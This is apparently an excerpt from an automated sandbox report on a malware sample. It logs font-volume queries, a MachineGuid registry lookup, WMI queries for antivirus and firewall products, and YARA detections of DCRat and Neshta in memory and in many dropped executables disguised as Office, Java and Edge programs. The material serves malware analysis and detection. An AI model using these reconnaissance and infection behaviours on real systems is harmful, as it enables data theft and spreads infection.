Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tAVtSoJGTaCxrZiXcJn.exe PID: 8740, type: MEMORYSTR

Yara detected Neshta

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.2186722542.0000000000409000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762934153.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 6636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.com PID: 9192, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\svchost.com, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED
